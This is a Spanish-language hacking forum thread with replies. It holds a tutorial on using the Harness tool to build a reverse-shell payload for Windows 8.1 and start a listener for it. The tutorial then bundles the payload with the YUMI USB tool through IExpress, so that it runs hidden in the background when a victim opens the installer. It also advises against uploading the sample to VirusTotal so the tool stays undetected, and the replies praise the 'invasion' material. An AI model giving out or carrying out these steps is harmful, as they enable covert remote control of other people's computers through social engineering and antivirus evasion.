Atacando Windows 8.1 Pro con Harness

Iniciado por Stuxnet, Diciembre 20, 2015, 08:45:58 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Diciembre 20, 2015, 08:45:58 PM Ultima modificación: Diciembre 21, 2015, 11:14:51 AM por Stuxnet

Saludos amigos en este pequeño tutorial atacaremos un sistema windows 8.1 x86 con la herramienta harness.


Harness fue presentada en la DEFCON23 esta tool nos permite generar payload de acceso remoto con la capacidad de proporcioanar una interfaz de control remoto de powershell.

Vamos a ello.

Clonamos el proyecto desde Github

Código: php
git clone https://github.com/rich5/Harness


Para la instalacion de la herramienta ejecutaremos los siguientes comandos.

Código: php
cd Harness
chmod 755 python_install.sh
./python_install.sh


Código: php
wget http://python.org/ftp/python/3.4.3/Python-3.4.3.tar.xz
tar xf Python-3.4.3.tar.xz
cd Python-3.4.3
./configure --prefix=/usr/local --enable-shared LDFLAGS="-Wl,-rpath /usr/local/lib"
make && make altinstall



Tambien se ha corregido el bug con el autocompletado, para eso ejecuta los siguientes comando

Código: php
apt-get install libssl-dev openssl
apt-get install python3-pip
apt-get install libcurses5-dev
pip3 install readline
python_install.sh


Ahora si stuxnet atack !!! xD

Ejecutamos harness de la siguiente manera

Código: php
python3.4 harness.py



Ahora listaremos los módulos de la tool de la siguiente manera

Código: php
show modules



En este caso usare el ultimo payload ya que el windows que atacare es x86, para eso lo cargaremos de la siguiente manera.

Código: php
load payloads/TCP/x86/exe/Harness_x86


y para ver sus opciones

Código: php
show options



Ahora procederemos a configurarlo, IP = su ip y PORT el puerto que usaran en mi caso usare el 4444


ahora ya configurado todo ejecutamos el comando run y nos preguntara un nombre en mi caso underc0de.exe, se guardara en la carpeta de harness.


Ahora ejecutamos el comando back y procederemos a configurar el handler


Código: php
load handlers/PSHandler


ahora lo procederemos a configurarlo

IP = Su IP
PORT = su puerto
SSL = false


Ahora si ejecutamos run y tendremos en escucha nuestro handler xD ahora es hora de hacer un poco de ingeniería social y les mostrare un pequeño método.


IExpress, creador de instaladores :3

Esta tool es nativa desde windows XP que nos permite crear archivos comprimidos y autoinstaladores.

Para esto utilizaremos cualquier aplicación que deseemos, en mi caso utilizare YUMI una simple tool para crear usb boteables y el backdoor


y ahora el tipico siguiente


En esta parte nos pedirá agregar las dos aplicaciones que deseamos :3


y ahora siguiente y configuramos de la siguiente manera para que el backdoor se ejecute en segundo plano


Luego en siguiente y dejamos esto asi


y le ahora siguiente  nos preguntara donde queremos guardar y luego terminar :3 y se genera nuestro autoinstalador para pasarselo a la victima


Ahora cuando nuestra victima ejecute el programa se abrira la aplicación de YUMI y por debajo el backdoor asi dando nuestra session de powershell !!!!


ahora ejecutamos para ver nuestras sesiones

Código: php
show sessions



Para interactuar con nuestra sesión lo hacemos de la siguiente forma y Fuegoooo en la cocinaa :3 lo que pase después esta en su imaginación.

Código: php
session 1




Nota: No subaan nada a virustotaaal no quemen esta maravillosa herramienta aun en desarrollo

Bytes:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Que buen aporte @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta!! Se ve genial bro!
Felicitaciones por el material!

Saludos!
ANTRAX


Muy buen material @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, gracias por compartir.

Seria bueno saber que podría atacarse cualquier otra versión de windows con esta maravillosa herramienta.

Saludos y gracias una vez mas.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Realmente se podria hasta con windows 10 y 7 lo hice con el 8.1 porque ya tenia montada la virtual. En todo caso solo seria de cambiar el payload para x64 o x86 y empezar a jugar con ella, como mencione todo esta en su imaginacion :3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Muy buen tutorial y buena app ahí van mis +1 @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta!

Saludos.



Madre mia.. Muy buen aporte de invasion..
Fire bomb!!! :o